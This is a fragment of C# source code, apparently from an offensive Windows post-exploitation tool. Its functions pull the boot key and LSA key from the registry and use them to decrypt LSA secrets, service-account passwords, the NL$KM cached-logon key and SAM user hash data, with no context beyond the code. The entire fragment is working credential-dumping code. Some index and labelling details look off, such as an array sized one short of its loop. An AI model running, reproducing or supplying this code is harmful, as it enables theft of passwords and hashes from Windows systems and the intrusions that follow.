////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal CacheDump()
{
String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");
Console.WriteLine("[*] {0} Cached Logons Set", logonCount);
Byte[] bootKey = LSASecrets.GetBootKey();
Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
Byte[] nlkm = GetNlkm(lsaKey);
Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
GetCache(nlkm);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal void DumpLSASecrets()
{
Console.WriteLine("[*] Reading Secrets Key: SECURITY\\Policy\\Secrets");
String[] secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SECURITY\Policy\Secrets").GetSubKeyNames();
if (secretSubKeys.Length <= 0)
{
Console.WriteLine("[-] [-] Reading Secrets key failed");
return;
}
Byte[] bootKey = GetBootKey();
Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
Byte[] lsaKey = GetLsaKey(bootKey);
Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
foreach (String secret in secretSubKeys)
{
Byte[] managedArray = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\" + secret + "\\CurrVal", "");
Byte[] decryptedSecret = DecryptLsa(managedArray, lsaKey);
String serviceName = "";
String userName = "";
String password = "";
if (secret == "$MACHINE.ACC" || secret == "NL$KM" || secret == "DPAPI_SYSTEM")
{
serviceName = secret;
password = BitConverter.ToString(decryptedSecret.Skip(16).Take((Int32)decryptedSecret[0]).ToArray());
}
else if (secret.Substring(0, 4) == "_SC_")
{
serviceName = secret.Substring(4, secret.Length - 4);
userName = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SYSTEM\CurrentControlSet\Services\" + serviceName, "ObjectName");
password = ParseDecrypted(decryptedSecret);
}
else
{
serviceName = secret;
password = ParseDecrypted(decryptedSecret);
}
String result = String.Format("{0,-30} {1,-20} {2,-20}\n", serviceName, userName, password);
Console.WriteLine(result);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal UserKeys[] GetUserHashes(Byte[] hBootKey)
{
int size = 0;
UIntPtr hKey = new UIntPtr();
Int32 type = 0;
Dictionary <Int32, String> ridMapping = new Dictionary <Int32, String>();
String[] namesSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\Names").GetSubKeyNames();
foreach (String name in namesSubKeys)
{
if (advapi32.RegOpenKeyEx(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\Names\" + name, 0, Reg.KEY_QUERY_VALUE, out hKey) != 0)
{
Console.WriteLine("[-] Error opening key '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
return(null);
}
if (advapi32.RegQueryValueEx(hKey, "", 0, ref type, IntPtr.Zero, ref size) != 0)
{
Console.WriteLine("[-] [-] Error querying value '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
return(null);
}
ridMapping[type] = name;
}
String[] secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users").GetSubKeyNames();
UserKeys[] userKeys = new UserKeys[secretSubKeys.Length - 1];
for (Int32 i = 0; i < secretSubKeys.Length; i++)
{
if (secretSubKeys[i] != "Names")
{
userKeys[i].rid = Int32.Parse(secretSubKeys[i], System.Globalization.NumberStyles.HexNumber);
userKeys[i].userName = ridMapping[userKeys[i].rid];
userKeys[i].f = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "F");
userKeys[i].v = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "V");
userKeys[i].userPasswordHint = (Byte[])Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i]).GetValue("UserPasswordHint");
//userKeys[i].userPasswordHint = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "UserPasswordHint");
}
}
return(userKeys);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static Byte[] GetNlkm(Byte[] lsaKey)
{
Byte[] encryptedNlkm = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\NL$KM\CurrVal", "");
return(LSASecrets.DecryptLsa(encryptedNlkm, lsaKey));
}
